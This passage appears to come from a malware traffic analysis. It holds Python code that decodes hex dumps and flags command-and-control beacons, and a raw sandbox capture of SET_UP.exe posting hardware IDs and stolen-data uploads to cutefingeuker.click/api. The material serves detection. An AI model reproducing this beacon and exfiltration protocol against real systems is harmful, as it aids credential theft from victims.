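    """Turn the report's space-separated hex dump into raw bytes."""
    return bytes.fromhex(hexdump.replace(" ", ""))


def parse_form_body(hexdump: str) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body into single-valued fields."""
    text = hex_to_bytes(hexdump).decode("ascii")
    return {k: v[0] for k, v in parse_qs(text, keep_blank_values=True).items()}


def dechunk(hexdump: str) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: size line, CRLF, data, CRLF, ... until a 0 chunk."""
    data = hex_to_bytes(hexdump)
    out, pos = bytearray(), 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)  # ignore chunk extensions
        pos = end + 2
        if size == 0:
            break
        out += data[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF
    return bytes(out)


@dataclass
class Verdict:
    session: int
    act: str
    is_c2: bool
    reasons: list[str] = field(default_factory=list)


def classify(index: int, s: dict) -> Verdict:
    """Apply the (assumed) beacon rule to one session and record why it matched."""
    fields = parse_form_body(s["body_hex"])
    act = fields.get("act", "")
    v = Verdict(index, act, False)
    if s["method"] == "POST" and s["path"] == "/api":
        v.reasons.append("POST to /api")
    if len(hex_to_bytes(s["body_hex"])) != s["content_length"]:
        v.reasons.append("body length disagrees with Content-Length")
    if act == "life":
        v.reasons.append("keep-alive beacon act=life")
    elif act == "recive_message" and {"ver", "lid", "j"} <= fields.keys():
        v.reasons.append(f"task poll ver={fields['ver']} lid={fields['lid']}")
        if re.fullmatch(r"[0-9a-f]{32}", fields["j"]):
            v.reasons.append("j= is a 32-character lowercase hex token")
    if s["dst_ip"] in DNS_ANSWERS.get(s["host"], set()):
        v.reasons.append(f"{s['host']} resolved to {s['dst_ip']} in this capture")
    if s["reply_hex"] and dechunk(s["reply_hex"]) == b"ok":
        v.reasons.append('server acknowledged with chunked body "ok"')
    v.is_c2 = "POST to /api" in v.reasons and act in C2_ACTIONS
    return v


if __name__ == "__main__":
    for i, sess in enumerate(SESSIONS):
        verdict = classify(i, sess)
        print(f"session {i}: act={verdict.act} c2={verdict.is_c2}")
        for reason in verdict.reasons:
            print("   -", reason)
```

The DNS correlation step is there because the resolved addresses (188.114.96.x, 104.21.x, 172.67.x) belong to the same CDN that answers with Server: cloudflare, so an IP blocklist built from this report would catch shared infrastructure rather than the operator; the hostnames, the /api path and the act= vocabulary are the stable part of what the capture shows.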


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49750        188.114.96.3    443               7480  C:\Users\user\Desktop\SET_UP.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:02:20 UTC  267                OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 80
    Host: cutefingeuker.click
2025-01-05 17:02:20 UTC  80                 OUT
    Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
    Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d
2025-01-05 17:02:20 UTC  1120               IN
    HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 17:02:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=rguvpdh0gl1pla55bf9qf5i0i2; expires=Thu, 01 May 2025 10:48:59 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ck50ZijfASBikJBWgRgRAi3S9aAwj8fYDquMBnq9Yv3LzfCK9OA3pKIqM8R0I8TnDPdMPJM1ftMOLvvAUzrjVeOghZN7Oyl1Hu9%2FksCWRfT3uxSI14kHnhP9kfy3hphXTXLOIOgh"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd509109d2743b9-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1646&rtt_var=823&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=983&delivery_rate=344624&cwnd=192&unsent_bytes=0&cid=9b220fb7138cd675&ts=770&x=0"
2025-01-05 17:02:20 UTC  249                IN
2025-01-05 17:02:20 UTC  1369               IN
2025-01-05 17:02:20 UTC  1369               IN
2025-01-05 17:02:20 UTC  1369               IN
2025-01-05 17:02:20 UTC  1369               IN
2025-01-05 17:02:20 UTC  1369               IN
2025-01-05 17:02:20 UTC  1369               IN
2025-01-05 17:02:20 UTC  1369               IN
2025-01-05 17:02:20 UTC  1369               IN


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49751        188.114.96.3    443               7480  C:\Users\user\Desktop\SET_UP.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:02:21 UTC  278                OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=W6VF34HWOYV
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18122
    Host: cutefingeuker.click
2025-01-05 17:02:21 UTC  15331              OUT
    Data Raw: 2d 2d 57 36 56 46 33 34 48 57 4f 59 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 57 36 56 46 33 34 48 57 4f 59 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 36 56 46 33 34 48 57 4f 59 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 57 36 56 46 33 34 48 57 4f 59 56 0d 0a 43 6f 6e
    Data Ascii (line breaks restored from the CRLF bytes in the raw dump):
        --W6VF34HWOYV
        Content-Disposition: form-data; name="hwid"

        3ACDE1411CDC9910889EEA882476AC8E
        --W6VF34HWOYV
        Content-Disposition: form-data; name="pid"

        2
        --W6VF34HWOYV
        Content-Disposition: form-data; name="lid"

        hRjzG3--ELVIRA
        --W6VF34HWOYV
        Con
2025-01-05 17:02:21 UTC  2791               OUT
2025-01-05 17:02:22 UTC  1137               IN
    HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 17:02:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=6e2bdsdkllskqabknomr7i9qln; expires=Thu, 01 May 2025 10:49:00 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnv%2BhU1n1qoEuVtiN%2BfopvQ7w%2BWhEIXlIdJ65zge%2Ft0pTq8LwpRL8rv000nWA%2Bnmh5qp7wiJJq4cSXmZRyFcgwvsaX%2FP7BcH6KUc1NXbvFg2ZJhrkrDYaGN7C%2ByriYwRbaNbPAfX"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd50918e86fc35d-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1510&rtt_var=573&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2850&recv_bytes=19080&delivery_rate=1896103&cwnd=183&unsent_bytes=0&cid=580ee94ef6e868bd&ts=662&x=0"
2025-01-05 17:02:22 UTC  20                 IN
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-05 17:02:22 UTC  5                  IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 7480 | Process: C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:02:22 UTC | 274 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KOSWQ2L6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8725
Host: cutefingeuker.click
2025-01-05 17:02:22 UTC | 8725 | OUT | Data Raw: 2d 2d 4b 4f 53 57 51 32 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 4b 4f 53 57 51 32 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 4f 53 57 51 32 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 4b 4f 53 57 51 32 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
Data Ascii: --KOSWQ2L6Content-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--KOSWQ2L6Content-Disposition: form-data; name="pid"2--KOSWQ2L6Content-Disposition: form-data; name="lid"hRjzG3--ELVIRA--KOSWQ2L6Content-Disposi
2025-01-05 17:02:24 UTC | 1138 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:02:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2jdv5hrjqhk7fjb2cs7rkif46m; expires=Thu, 01 May 2025 10:49:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DwGaBxDJj4yD5I8IRhVqRzHdC9PwKH%2Fd%2B%2Fr5uKRFC2BTOltf%2Bftq0RGw1Vzp%2F8GI0MEOsh35HxWuH1gcuBReV8tU8CBjQX9pG4Q%2FCSTBqcaaWyBGsZY36NmjFhwNMo%2FVEw8HAEN%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd5092048df729e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1965&rtt_var=752&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2850&recv_bytes=9657&delivery_rate=1441975&cwnd=165&unsent_bytes=0&cid=6c00ee2c02829a46&ts=1519&x=0"
2025-01-05 17:02:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-05 17:02:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49753 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 7480 | Process: C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:02:24 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ENMNWZ6IBCXER1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20414
Host: cutefingeuker.click
2025-01-05 17:02:24 UTC | 15331 | OUT | Data Raw: 2d 2d 45 4e 4d 4e 57 5a 36 49 42 43 58 45 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 45 4e 4d 4e 57 5a 36 49 42 43 58 45 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 4e 4d 4e 57 5a 36 49 42 43 58 45 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 45 4e 4d 4e 57 5a 36
Data Ascii: --ENMNWZ6IBCXER1Content-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--ENMNWZ6IBCXER1Content-Disposition: form-data; name="pid"3--ENMNWZ6IBCXER1Content-Disposition: form-data; name="lid"hRjzG3--ELVIRA--ENMNWZ6
2025-01-05 17:02:24 UTC | 5083 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: lrQMn 64F6(X&7~`aO
2025-01-05 17:02:25 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:02:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5ts4l3jfe8dnl32aduteg89nn1; expires=Thu, 01 May 2025 10:49:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRiDKOQ7SlDWlEFEl%2BFoDaGZpp5Bdd4Hb5ONpvPAU%2F6CkqJjTwVYqLHsD%2BYukalSiqRUYJcJVYglhGGOZsjT93s0zot8CToOYNynQFy4nhw7eeH6G7230tiE%2FOJRurcaWNANczDp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd5092def70430a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1601&rtt_var=619&sent=10&recv=26&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21375&delivery_rate=1743283&cwnd=225&unsent_bytes=0&cid=9f5ce4bb3a96873f&ts=639&x=0"
2025-01-05 17:02:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-05 17:02:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 7480 | Process: C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:02:26 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=OWVLA8FA5OYYV1IS08
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 969
Host: cutefingeuker.click
2025-01-05 17:02:26 UTC | 969 | OUT | Data Raw: 2d 2d 4f 57 56 4c 41 38 46 41 35 4f 59 59 56 31 49 53 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 4f 57 56 4c 41 38 46 41 35 4f 59 59 56 31 49 53 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 57 56 4c 41 38 46 41 35 4f 59 59 56 31 49 53 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52
Data Ascii: --OWVLA8FA5OYYV1IS08Content-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--OWVLA8FA5OYYV1IS08Content-Disposition: form-data; name="pid"1--OWVLA8FA5OYYV1IS08Content-Disposition: form-data; name="lid"hRjzG3--ELVIR
2025-01-05 17:02:26 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:02:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=cqi7ag16mrlfbie526umoio68m; expires=Thu, 01 May 2025 10:49:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlmffWt3gchBRFJQPPToJ1ErdrtCwAkzfYjSMLqeEP0sw2dxOynSO%2Bhdg%2BV8R3QIkWO4bc68UOZIHWpbFuPvIKPgGu1hu3sXvMzsFzmlD%2BYzbTfnRFmW440B1iejD89P2N3Ud631"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd50936fc636a56-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=5398&min_rtt=1605&rtt_var=3012&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1888&delivery_rate=1819314&cwnd=224&unsent_bytes=0&cid=6f39ca2280decb1e&ts=477&x=0"
2025-01-05 17:02:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-05 17:02:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 7480 | Process: C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:02:27 UTC | 285 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=T5N7UV5S1D0O744WPN5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1110
Host: cutefingeuker.click
2025-01-05 17:02:27 UTC | 1110 | OUT | Data Raw: 2d 2d 54 35 4e 37 55 56 35 53 31 44 30 4f 37 34 34 57 50 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 54 35 4e 37 55 56 35 53 31 44 30 4f 37 34 34 57 50 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 35 4e 37 55 56 35 53 31 44 30 4f 37 34 34 57 50 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c
Data Ascii: --T5N7UV5S1D0O744WPN5Content-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--T5N7UV5S1D0O744WPN5Content-Disposition: form-data; name="pid"1--T5N7UV5S1D0O744WPN5Content-Disposition: form-data; name="lid"hRjzG3--EL
2025-01-05 17:02:27 UTC | 1120 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:02:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=pninpq1vl87imi4t7f8nuri3mn; expires=Thu, 01 May 2025 10:49:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IiDdgVTiGrwv7ZLlltkwFP0E5p0RvVZMsF3d416zsNEcZi2eS5e48NpLC8Y4C3Qo1ZgNPCJKJM29Vk7FpaOP9T5tOGdyAXK7vOiXBgBqaPxZYU7uGYJ8j1L8hzrjSBTe2CrGyKVd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd5093d38d9c339-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1491&rtt_var=576&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2031&delivery_rate=1871794&cwnd=247&unsent_bytes=0&cid=fdda10b56e06eec0&ts=488&x=0"
                                                                                                                                                                                                2025-01-05 17:02:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                2025-01-05 17:02:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49756        188.114.96.3    443               7480  C:\Users\user\Desktop\SET_UP.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:02:28 UTC  268                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 115
Host: cutefingeuker.click
2025-01-05 17:02:28 UTC  115                OUT        Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45
Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=3ACDE1411CDC9910889EEA882476AC8E
2025-01-05 17:02:28 UTC  1120               IN         HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:02:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=os1ons2r9d671eqs7vdqaj9mie; expires=Thu, 01 May 2025 10:49:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9JQy6cIdfyegXft48dvLbKrRJDEvNX3uyzMXLb9FVWv9RFl0PwOBb0jnCdiaqlp7eT9jKqtO165QvATTo3VZm9OtXxaMW8No6wfCcZQSAN4zp4udrcS1CqAfncfKJbdnSJmuUfQ3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd509436b14f78f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1596&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1019&delivery_rate=1773997&cwnd=137&unsent_bytes=0&cid=f3952f9dcca70ee4&ts=476&x=0"
